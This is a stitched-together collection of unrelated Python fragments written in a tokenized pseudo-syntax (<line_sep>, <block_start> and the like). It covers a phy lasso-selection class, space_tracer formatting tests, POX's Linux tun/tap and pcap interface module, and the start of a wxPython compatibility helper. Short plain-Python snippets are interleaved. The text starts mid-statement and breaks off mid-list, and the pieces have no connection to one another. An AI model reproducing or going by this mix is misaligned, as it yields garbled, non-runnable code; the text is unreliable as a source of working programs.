len(self._points))<line_sep>self.update_lasso_visual()<block_end>@property<def_stmt>polygon self<block_start>"""Coordinates of the polygon vertices."""<line_sep>l=self._points<line_sep># Close the polygon. # l = l + l[0] if len(l) else l out=np.array(l dtype=np.float64)<line_sep>out=np.reshape(out (out.size<floordiv>2 2))<assert_stmt>out.ndim<eq>2<assert_stmt>out.shape[1]<eq>2<line_sep><return>out<block_end><def_stmt>clear self<block_start>"""Reset the lasso."""<line_sep>self._points=[]<line_sep>self.box=<none><line_sep>self.update_lasso_visual()<block_end>@property<def_stmt>count self<block_start>"""Number of vertices in the polygon."""<line_sep><return>len(self._points)<block_end><def_stmt>in_polygon self pos<block_start>"""Return which points belong to the polygon."""<line_sep><return>_in_polygon(pos self.polygon)<block_end><def_stmt>attach self canvas<block_start>"""Attach the lasso to a canvas."""<line_sep>canvas.attach_events(self)<line_sep>self.canvas=canvas<line_sep>self.create_lasso_visual()<block_end><def_stmt>create_lasso_visual self<block_start>"""Create the lasso visual."""<line_sep>self.visual=PolygonVisual()<line_sep>self.canvas.add_visual(self.visual clearable=<false>)<block_end><def_stmt>update_lasso_visual self<block_start>"""Update the lasso visual with the current polygon."""<if_stmt><not>self.visual<and>self.count<g>0<block_start><return><block_end># The following call updates a_box_index with the active box in BaseLayout. self.visual.set_data(pos=self.polygon)<line_sep>self.canvas.update()<block_end><def_stmt>on_mouse_click self e<block_start>"""Add a polygon point with ctrl+click."""<if_stmt>'Control'<in>e.modifiers<block_start><if_stmt>e.button<eq>'Left'<block_start>layout=getattr(self.canvas 'layout' <none>)<if_stmt>hasattr(layout 'box_map')<block_start>box,pos=layout.box_map(e.pos)<line_sep># Only update the box for the first click, so that the box containing # the lasso is determined by the first click only. <if_stmt>self.box<is><none><block_start>self.box=box<block_end># Avoid clicks outside the active box (box of the first click). 
<if_stmt>box<ne>self.box<block_start><return><block_end><block_end><else_stmt># pragma: no cover <block_start>pos=self.canvas.window_to_ndc(e.pos)<block_end># Force the active box to be the box of the first click, not the box of the # current click. <if_stmt>layout<block_start>layout.active_box=self.box<block_end>self.add(pos)# call update_lasso_visual emit("lasso_updated" self.canvas self.polygon)<block_end><else_stmt><block_start>self.clear()<line_sep>self.box=<none><block_end><block_end><block_end><def_stmt>__repr__ self<block_start><return>str(self.polygon)<block_end><block_end>
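A small self-check (not part of phy) of the NDC-to-subplot mapping used by Grid.get_closest_box above, where x and y are in [-1, 1] and row 0 sits at the top:
import numpy as np

def closest_box(pos, shape):
    x, y = pos
    rows, cols = shape
    j = np.clip(int(cols * (1. + x) / 2.), 0, cols - 1)
    i = np.clip(int(rows * (1. - y) / 2.), 0, rows - 1)
    return i, j

assert closest_box((-1.0, 1.0), (2, 3)) == (0, 0)    # top-left corner
assert closest_box((0.99, -0.99), (2, 3)) == (1, 2)  # bottom-right corner
assert closest_box((0.0, 0.0), (2, 3)) == (1, 1)     # centre lands in row 1, col 1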
<import_from_stmt>space_tracer.main replace_input TraceRunner<def_stmt>test_source_width_positive <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '8' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_width_negative <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '-2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '4' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent_small <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent_negative <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '-2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i ="""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_width' '15' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width_negative <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2 s = 'a' * 10 | s = 'aaaaaa"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_width' '-5' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width_without_source <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 2 s = 'aaaaaa"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '0' '--trace_width' '-5' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_offset <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 1 + 1 | 2 s = 'a' * 10 | 'aaaaaaaaaa'"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_offset' '3' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end>
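To see the untruncated report that the width/indent/offset options above are carving up, the same API can be driven without any width flags (the output layout is whatever space_tracer emits by default):
from space_tracer.main import replace_input, TraceRunner

code = "i = 1 + 1\ns = 'a' * 10\n"
with replace_input(code):
    print(TraceRunner().trace_command(['space_tracer', '--traced_file', 'foo.py']))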
# Copyright 2017 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Input and output from network interfaces. This wraps PCap, TunTap, etc., to provide a simple, universal, cooperative interface to network interfaces. Currently limited to Linux. """<import_from_stmt>pox.lib.pxpcap PCap<import_from_stmt>queue Queue<import_from_stmt>pox.lib.revent Event EventMixin<import_from_stmt>pox.lib.ioworker.io_loop ReadLoop<import_from_stmt>pox.core core<import_stmt>struct<import_from_stmt>fcntl ioctl<import_stmt>socket<import_from_stmt>pox.lib.addresses EthAddr IPAddr<import_from_stmt>pox.lib.addresses parse_cidr cidr_to_netmask<import_stmt>os<import_stmt>ctypes<line_sep>IFNAMESIZ=16<line_sep>IFREQ_SIZE=40<line_sep># from linux/if_tun.h TUNSETIFF=0x400454ca<line_sep>TUNGETIFF=0x800454d2<line_sep>IFF_TUN=0x0001<line_sep>IFF_TAP=0x0002<line_sep>IFF_NO_PI=0x1000<line_sep>IFF_ONE_QUEUE=0x2000<line_sep>IFF_VNET_HDR=0x4000<line_sep>IFF_TUN_EXCL=0x8000<line_sep>IFF_MULTI_QUEUE=0x0100<line_sep>IFF_ATTACH_QUEUE=0x0200<line_sep>IFF_DETACH_QUEUE=0x0400<line_sep>IFF_PERSIST=0x0800<line_sep>IFF_NOFILTER=0x1000<line_sep>#from linux/if.h (flags) IFF_UP=1<lshift>0<line_sep>IFF_BROADCAST=1<lshift>1<line_sep>IFF_DEBUG=1<lshift>2<line_sep>IFF_LOOPBACK=1<lshift>3<line_sep>IFF_POINTOPOINT=1<lshift>4<line_sep>IFF_NOTRAILERS=1<lshift>5<line_sep>IFF_RUNNING=1<lshift>6<line_sep>IFF_NOARP=1<lshift>7<line_sep>IFF_PROMISC=1<lshift>8<line_sep>IFF_ALLMULTI=1<lshift>9<line_sep>IFF_MASTER=1<lshift>10<line_sep>IFF_SLAVE=1<lshift>11<line_sep>IFF_MULTICAST=1<lshift>12<line_sep>IFF_PORTSEL=1<lshift>13<line_sep>IFF_AUTOMEDIA=1<lshift>14<line_sep>IFF_DYNAMIC=1<lshift>15<line_sep>IFF_LOWER_UP=1<lshift>16<line_sep>IFF_DORMANT=1<lshift>17<line_sep>IFF_ECHO=1<lshift>18<line_sep># Unless IFF_NO_PI, there's a header on packets: # 16 bits of flags # 16 bits (big endian?) protocol number # from /usr/include/linux/sockios.h SIOCGIFHWADDR=0x8927<line_sep>SIOCGIFMTU=0x8921<line_sep>SIOCSIFMTU=0x8922<line_sep>SIOCGIFFLAGS=0x8913<line_sep>SIOCSIFFLAGS=0x8914<line_sep>SIOCSIFHWADDR=0x8924<line_sep>SIOCGIFNETMASK=0x891b<line_sep>SIOCSIFNETMASK=0x891c<line_sep>SIOCGIFADDR=0x8915<line_sep>SIOCSIFADDR=0x8916<line_sep>SIOCGIFBRDADDR=0x8919<line_sep>SIOCSIFBRDADDR=0x891a<line_sep>SIOCSIFNAME=0x8923<line_sep>SIOCADDRT=0x890B# rtentry (route.h) for IPv4, in6_rtmsg for IPv6 SIOCDELRT=0x890C<line_sep># from /usr/include/linux/if_arp.h ARPHRD_ETHER=1<line_sep>ARPHRD_IEEE802=1<line_sep>ARPHRD_IEEE1394=24<line_sep>ARPHRD_EUI64=27<line_sep>ARPHRD_LOOPBACK=772<line_sep>ARPHRD_IPGRE=778<line_sep>ARPHRD_IEE802_TR=800<line_sep>ARPHRD_IEE80211=801<line_sep>ARPHRD_IEE80211_PRISM=802<line_sep>ARPHRD_IEE80211_RADIOTAP=803<line_sep>ARPHRD_IP6GRE=823<class_stmt>rtentry(object)<block_start>""" Wrapper for Linux rtentry Only tries to capture IPv4 usage. Possibly better done with ctypes. 
"""<line_sep># flags RTF_UP=0x0001# usable RTF_GATEWAY=0x0002# dst is gateway RTF_HOST=0x0004# host route RTF_REINSTATE=0x0008# reinstate after timeout RTF_DYNAMIC=0x0010# created dynamically (by redirect) RTF_MODIFIED=0x0020# modified dynamically (by redirect) RTF_MSS=0x0040# use specific MSS for this route RTF_WINDOW=0x0080# use per-route window clamping RTF_IRTT=0x0100# use initial RTT RTF_REJECT=0x0200# reject route # fields rt_hash=0<line_sep>rt_dst=IPAddr("0.0.0.0")<line_sep>rt_gateway=IPAddr("0.0.0.0")<line_sep>rt_genmask=IPAddr("0.0.0.0")<line_sep>rt_flags=0<line_sep>rt_refcnt=0<line_sep>rt_use=0<line_sep>rt_ifp=0# ptr to struct ifnet rt_metric=0<line_sep>rt_dev=<none># device name rt_mss=0<line_sep>rt_window=0# window clamping rt_irtt=0# initial RTT <def_stmt>pack self<block_start><if_stmt>self.rt_dev<block_start>s=ctypes.c_char_p(self.rt_dev+"\0")# Null terminator necessary? dev=ctypes.cast(s ctypes.c_void_p).value<line_sep>self._buf=s# You must use the resulting packed string before changing # rt_dev! <block_end><else_stmt><block_start>dev=0<block_end><return>struct.pack("L16s16s16shhLPhPLLH" self.rt_hash sockaddr_in(self.rt_dst).pack() sockaddr_in(self.rt_gateway).pack() sockaddr_in(self.rt_genmask).pack() self.rt_flags self.rt_refcnt self.rt_use self.rt_ifp self.rt_metric dev self.rt_mss self.rt_window self.rt_irtt)<block_end><block_end><class_stmt>sockaddr_in(object)<block_start>""" Wrapper for sockaddr_in """<line_sep>sin_family=socket.AF_INET<line_sep>sin_port=0<line_sep>sin_addr=IPAddr("0.0.0.0")<def_stmt>__init__ self addr=<none> port=<none><block_start><if_stmt>addr<is><not><none><block_start>self.sin_addr=IPAddr(addr)<block_end><if_stmt>port<is><not><none><block_start>self.sin_port=port<block_end><block_end><def_stmt>pack self<block_start>r=struct.pack("hH" self.sin_family self.sin_port)<line_sep>r<augadd>self.sin_addr.raw<line_sep>r<augadd>("\0"<times>8)<line_sep><return>r<block_end><block_end><class_stmt>Interface(object)<block_start>""" Simple interface to tun/tap driver Currently only for Linux. IIRC, shouldn't be too hard to adapt for BSD. Other OSes will probably need a fair amount of work. """<line_sep>#TODO: Setters <def_stmt>__init__ self name<block_start>self._name=name<block_end><def_stmt>__str__ self<block_start><return>"%s('%s')"%(type(self).__name__ self.name)<block_end>@property<def_stmt>name self<block_start><return>self._name.rstrip("\0")<block_end>@name.setter<def_stmt>name self value<block_start><if_stmt>len(value)<g>IFNAMESIZ<block_start><raise>RuntimeError("Name too long")<block_end>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>value<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFNAME ifr)<line_sep>self._name=value<block_end>@property<def_stmt>ipv6_enabled self<block_start>f=file("/proc/sys/net/ipv6/conf/%s/disable_ipv6"%(self.name ) "r")<with_stmt>f<block_start><return>f.read()[0]<eq>"0"<block_end><block_end># Note inversion! @ipv6_enabled.setter<def_stmt>ipv6_enabled self value<block_start>f=file("/proc/sys/net/ipv6/conf/%s/disable_ipv6"%(self.name ) "w")<with_stmt>f<block_start>f.write("0"<if>value<else>"1")<block_end><block_end># Note inversion! 
@property<def_stmt>ip_forwarding self<block_start>f=file("/proc/sys/net/ipv4/conf/%s/forwarding"%(self.name ) "r")<with_stmt>f<block_start><return>f.read()[0]<eq>"1"<block_end><block_end>@ip_forwarding.setter<def_stmt>ip_forwarding self value<block_start>f=file("/proc/sys/net/ipv4/conf/%s/forwarding"%(self.name ) "w")<with_stmt>f<block_start>f.write("1"<if>value<else>"0")<block_end><block_end>@property<def_stmt>mtu self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFMTU ifr)<line_sep><return>struct.unpack("I" ret[IFNAMESIZ:][:4])[0]<block_end>@mtu.setter<def_stmt>mtu self value<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sI" self.name value)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFMTU ifr)<block_end>@property<def_stmt>flags self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFFLAGS ifr)<line_sep><return>struct.unpack("H" ret[IFNAMESIZ:IFNAMESIZ+2])[0]<block_end>@flags.setter<def_stmt>flags self value<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" self.name value)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFFLAGS ifr)<block_end><def_stmt>set_flags self flags on=<true><block_start><if_stmt>on<block_start>self.flags<augor>flags<block_end><else_stmt><block_start>self.unset_flags(flags)<block_end><block_end><def_stmt>unset_flags self flags<block_start>self.flags=self.flags&(flags^0xffFF)<block_end>@property<def_stmt>promiscuous self<block_start><return>bool(self.flags&IFF_PROMISC)<block_end>@promiscuous.setter<def_stmt>promiscuous self value<block_start>self.set_flags(IFF_PROMISC value)<block_end>@property<def_stmt>is_up self<block_start><return>(self.flags&IFF_UP)<ne>0<block_end>@is_up.setter<def_stmt>is_up self value<block_start>self.set_flags(IFF_UP value)<block_end>@property<def_stmt>is_running self<block_start><return>(self.flags&IFF_RUNNING)<ne>0<block_end>@property<def_stmt>arp_enabled self<block_start><return>(self.flags&IFF_NOARP)<eq>0<block_end>@arp_enabled.setter<def_stmt>arp_enabled self value<block_start>self.set_flags(IFF_NOARP <not>value)<block_end>@property<def_stmt>ip_addr self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFADDR)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@ip_addr.setter<def_stmt>ip_addr self value<block_start><return>self._ioctl_set_ipv4(SIOCSIFADDR value)<block_end>@property<def_stmt>netmask self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFNETMASK)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@netmask.setter<def_stmt>netmask self value<block_start><return>self._ioctl_set_ipv4(SIOCSIFNETMASK value)<block_end>@property<def_stmt>broadcast_addr self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFBRDADDR)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@broadcast_addr.setter<def_stmt>broadcast_addr self 
value<block_start><return>self._ioctl_set_ipv4(SIOCSIFBRDADDR value)<block_end>@property<def_stmt>eth_addr self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFHWADDR ifr)<line_sep>sa=ret[IFNAMESIZ:]# sockaddr <return>self._get_eth(sa)<block_end>@eth_addr.setter<def_stmt>eth_addr self value<block_start>value=EthAddr(value).raw<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" self.name ARPHRD_ETHER)<line_sep>ifr<augadd>value# Append to sockaddr ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFHWADDR ifr)<block_end><def_stmt>_ioctl_get_ipv4 self which<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock which ifr)<line_sep><return>self._get_ipv4(ret[IFNAMESIZ:])<block_end><def_stmt>_ioctl_set_ipv4 self which value<block_start>value=IPAddr(value)<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sHHI" self.name socket.AF_INET 0 value.toUnsigned(networkOrder=<true>))<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock which ifr)<block_end>@staticmethod<def_stmt>_get_ipv4 sa<block_start>sa_family=struct.unpack("H" sa[:2])[0]<if_stmt>sa_family<eq>socket.AF_INET<block_start><return>IPAddr(sa[4:8])<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported hardware type %s for %s (expected %s)"%(sa_family self socket.AF_INET))<block_end><block_end>@staticmethod<def_stmt>_get_eth sa<block_start>sa_family=struct.unpack("H" sa[:2])[0]<if_stmt>sa_family<eq>ARPHRD_ETHER<block_start><return>EthAddr(sa[2:8])<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported hardware type %s (expected %s)"%(sa_family ARPHRD_ETHER))<block_end><block_end><def_stmt>add_default_route self *args **kw<block_start><return>self.add_route("0.0.0.0/0" *args **kw)<block_end><def_stmt>add_route self network gateway=<none> dev=() metric=0<block_start>""" Add routing table entry If dev is unspecified, it defaults to this device """<line_sep><return>self._add_del_route(network gateway dev metric SIOCADDRT)<block_end><def_stmt>del_route self network gateway=<none> dev=() metric=0<block_start>""" Remove a routing table entry If dev is unspecified, it defaults to this device """<line_sep><return>self._add_del_route(network gateway dev metric SIOCDELRT)<block_end><def_stmt>_add_del_route self network gateway=<none> dev=() metric=0 command=<none><block_start>""" Add or remove a routing table entry If dev is unspecified, it defaults to this device """<line_sep>r=rtentry()<if_stmt>isinstance(network tuple)<block_start>addr,mask=network<line_sep>addr=str(addr)<if_stmt>isinstance(mask int)<block_start>mask=cidr_to_netmask(mask)<block_end>mask=str(mask)<line_sep>network="%s/%s"%(addr mask)<block_end>host=<false><if_stmt>isinstance(network IPAddr)<or>(isinstance(network str)<and>"/"<not><in>network)<block_start>host=<true><block_end>network,bits=parse_cidr(network)<line_sep>r.rt_dst=network<line_sep>r.rt_genmask=cidr_to_netmask(bits)<if_stmt>gateway<is><not><none><block_start>r.rt_gateway=IPAddr(gateway)<line_sep>r.rt_flags<augor>r.RTF_GATEWAY<block_end>r.rt_metric=metric<if_stmt>dev<is>()<block_start>dev=self<block_end><if_stmt>isinstance(dev 
Interface)<block_start>dev=dev.name<block_end><if_stmt>dev<block_start>r.rt_dev=dev<block_end><if_stmt>host<block_start>r.rt_flags<augor>r.RTF_HOST<block_end>r.rt_flags<augor>r.RTF_UP<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>rv=ioctl(sock command r.pack())<block_end><block_end><class_stmt>TunTap(object)<block_start>""" Simple wrapper for tun/tap interfaces Looks like a file-like object. You should be able to read/write it, select on it, etc. """<def_stmt>__init__ self name=<none> tun=<false> raw=<false><block_start>""" Create tun or tap By default, it creates a new tun or tap with a default name. If you specify a name, it will either try to create it (if it doesn't exist), or try to use an existing interface (for which you must have permission). Defaults to tap (Ethernet) mode. Specify tun=True for tun (IP) mode. Specify raw=True to skip the 32 bits of flag/protocol metadata. """<if_stmt>name<is><none><block_start>name=""<block_end>openflags=os.O_RDWR<try_stmt><block_start>openflow<augor>os.O_BINARY<block_end><except_stmt><block_start><pass><block_end>self._f=os.open("/dev/net/tun" openflags)<line_sep># an ifreq is IFREQ_SIZE bytes long, starting with an interface name # (IFNAMESIZ bytes) followed by a big union. self.is_tun=tun<line_sep>self.is_tap=<not>tun<line_sep>self.is_raw=raw<line_sep>flags=0<if_stmt>tun<block_start>flags<augor>IFF_TUN<block_end><else_stmt><block_start>flags<augor>IFF_TAP<block_end><if_stmt>raw<block_start>flags<augor>IFF_NO_PI<block_end>ifr=struct.pack(str(IFNAMESIZ)+"sH" name flags)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(self.fileno() TUNSETIFF ifr)<line_sep>self.name=ret[:IFNAMESIZ]<line_sep>iflags=flags<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" name 0)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(self.fileno() TUNGETIFF ifr)<line_sep>flags=struct.unpack("H" ret[IFNAMESIZ:IFNAMESIZ+2])[0]<line_sep>self.is_tun=(flags&IFF_TUN)<eq>IFF_TUN<line_sep>self.is_tap=<not>self.is_tun<line_sep>#self.is_raw = (flags & IFF_NO_PI) == IFF_NO_PI <block_end><def_stmt>fileno self<block_start><return>self._f<block_end><def_stmt>write self data<block_start><return>os.write(self.fileno() data)<block_end><def_stmt>read self n<block_start><return>os.read(self.fileno() n)<block_end><def_stmt>close self<block_start><return>os.close(self.fileno())<block_end>@property<def_stmt>eth_addr self<block_start><return>Interface(self.name).eth_addr<block_end><block_end><class_stmt>RXData(Event)<block_start>""" Event fired when an interface receives data """<def_stmt>__init__ self interface data<block_start>self.interface=interface<line_sep>self.data=data<block_end><block_end><class_stmt>PCapInterface(Interface EventMixin)<block_start>_eventMixin_events=set([RXData ])<def_stmt>__init__ self name<block_start>Interface.__init__(self name)<line_sep>EventMixin.__init__(self)<line_sep>self._q=Queue()<line_sep>p=PCap(name callback=self._pcap_cb start=<false>)<line_sep>p.set_direction(<true> <false>)# Incoming, not outgoing p.start()<line_sep>self.pcap=p<line_sep>core.add_listener(self._handle_GoingDownEvent)<block_end><def_stmt>_handle_GoingDownEvent self event<block_start>self.close()<block_end><def_stmt>send self data<block_start><if_stmt>self.pcap<is><none><block_start><return><block_end>self.pcap.inject(data)<block_end><def_stmt>_pcap_cb self obj data sec usec length<block_start>""" Handles incoming data from pcap This may not be on the right thread, so we just push it to a thread-safe queue and poke the 
cooperative thread, which will pop it later. """<line_sep>do_read=self._q.empty()<line_sep>self._q.put((obj data))<if_stmt>do_read<block_start>core.callLater(self._queue_read)<block_end><block_end><def_stmt>_queue_read self<block_start>anything=<false><for_stmt>_ range(10)# as most X at once <block_start><try_stmt><block_start>data=self._q.get(<false>)<line_sep>self._q.task_done()<line_sep>anything=<true><block_end><except_stmt><block_start><break><block_end>pcap,data=data<line_sep>self.raiseEventNoErrors(RXData self data)<block_end><if_stmt>anything# Check for remainders later <block_start>core.callLater(self._queue_read)<block_end><block_end><def_stmt>__del__ self<block_start>self.close()<block_end><def_stmt>close self<block_start><if_stmt>self.pcap<block_start>self.pcap.close()<line_sep>self.pcap=<none><block_end><block_end><block_end><class_stmt>TapInterface(Interface EventMixin)<block_start>_eventMixin_events=set([RXData ])<line_sep>io_loop=<none><line_sep>max_read_size=1600<line_sep>default_send_protocol=<none><def_stmt>__init__ self name="" tun=<false> raw=<false> protocol=<none><block_start>self.tap=<none><line_sep>self.last_flags=<none><line_sep>self.last_protocol=<none><if_stmt>protocol<block_start>self.default_send_protocol=protocol<block_end>self.io_loop=ReadLoop.singleton<line_sep>Interface.__init__(self name)<line_sep>EventMixin.__init__(self)<line_sep>self.tap=TunTap(name raw=raw tun=tun)<if_stmt><not>name<block_start>self._name=self.tap.name<block_end>self.io_loop.add(self)<block_end>@property<def_stmt>is_tap self<block_start><return>self.tap.is_tap<block_end>@property<def_stmt>is_tun self<block_start><return>self.tap.is_tun<block_end><def_stmt>send self data flags=0 protocol=<none><block_start><if_stmt><not>self.tap.is_raw<block_start><if_stmt>protocol<is><none><block_start>protocol=self.default_send_protocol<or>0<block_end>#FIXME: In the "0" case above, should we fall back to using the Etherype # in the packet? <if_stmt>flags<or>protocol<block_start>flags=struct.pack("!HH" flags protocol)# Flags reversed? <block_end><else_stmt><block_start>flags="\0\0\0\0"<block_end>data=flags+data<block_end>self.tap.write(data)<block_end><def_stmt>_do_rx self<block_start>data=self.tap.read(self.max_read_size)<if_stmt><not>self.tap.is_raw<block_start>flags,proto=struct.unpack("!HH" data[:4])<line_sep>#FIXME: This may invert the flags... self.last_flags=flags<line_sep>self.last_protocol=proto<line_sep>data=data[4:]# Cut off header <block_end>self.raiseEvent(RXData self data)<block_end><def_stmt>fileno self# Support fileno so that this can be used in IO loop directly <block_start><return>self.tap.fileno()<block_end><def_stmt>close self<block_start><if_stmt>self.tap<block_start>self.tap.close()<line_sep>self.tap=<none><line_sep>self.io_loop.remove(self)<block_end><block_end><def_stmt>__del__ self<block_start>self.close()<block_end><block_end>
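The Interface class above is built entirely on the ifreq/ioctl pattern; as a stand-alone illustration (Linux only; "lo" is just a convenient interface name), the same pattern fetches an MTU with nothing but the stdlib:
import socket
import struct
from fcntl import ioctl

IFNAMESIZ, IFREQ_SIZE, SIOCGIFMTU = 16, 40, 0x8921

def get_mtu(ifname):
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    ifr = struct.pack(str(IFNAMESIZ) + "s", ifname.encode())   # name padded to 16 bytes
    ifr += b"\0" * (IFREQ_SIZE - len(ifr))                     # pad to full ifreq size
    ret = ioctl(sock, SIOCGIFMTU, ifr)
    return struct.unpack("I", ret[IFNAMESIZ:IFNAMESIZ + 4])[0]

print(get_mtu("lo"))   # typically 65536 for the loopback device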
<import_from_future_stmt> absolute_import division print_function<line_sep>''' Author : Lyubimov, A.Y. Created : 04/14/2014 Last Changed: 11/05/2018 Description : wxPython 3-4 compatibility tools The context managers, classes, and other tools below can be used to make the GUI code compatible with wxPython 3 and 4. Mostly, the tools convert the functions, enumerations, and classes which have been renamed in wxPython 4; the name mismatches result in exceptions. Use case 1: subclassing wx.PyControl or wx.Control: from wxtbx import wx4_compatibility as wx4c WxCtrl = wx4c.get_wx_mod(wx, wx.Control) class MyCustomControl(WxCtrl): ... Use case 2: brush style (NOTE: you can do that with fonts as well, but it doesn't seem to be necessary): from wxtbx import wx4_compatibility as wx4c bkgrd = self.GetBackgroundColour() with wx4c.set_brush_style(wx.BRUSHSTYLE_SOLID) as bstyle: brush = wx.Brush(bkgrd, bstyle) Use case 3: Toolbars from wxtbx import wx4_compatibility as wx4c, bitmaps class MyFrame(wx.Frame): def __init__(self, parent, id, title, *args, **kwargs): wx.Frame.__init__(self, parent, id, title, *args, **kwargs) self.toolbar = wx4c.ToolBar(self, style=wx.TB_TEXT) self.quit_button = self.toolbar.AddTool(toolId=wx.ID_ANY, label='Quit', kind=wx.ITEM_NORMAL, bitmap=bitmaps.fetch_icon_bitmap('actions', 'exit') shortHelp='Exit program') ... self.SetToolBar(self.toolbar) self.toolbar.Realize() '''<import_stmt>wx<import_from_stmt>contextlib contextmanager<import_stmt>importlib<line_sep>wx4=wx.__version__[0]<eq>'4'<line_sep>modnames=[('PyControl' 'Control') ('PyDataObjectSimple' 'DataObjectSimple') ('PyDropTarget' 'DropTarget') ('PyEvtHandler' 'EvtHandler') ('PyImageHandler' 'ImageHandler') ('PyLocale' 'Locale') ('PyLog' 'Log') ('PyPanel' 'Panel') ('PyPickerBase' 'PickerBase') ('PyPreviewControlBar' 'PreviewControlBar') ('PyPreviewFrame' 'PreviewFrame') ('PyPrintPreview' 'PrintPreview') ('PyScrolledWindow' 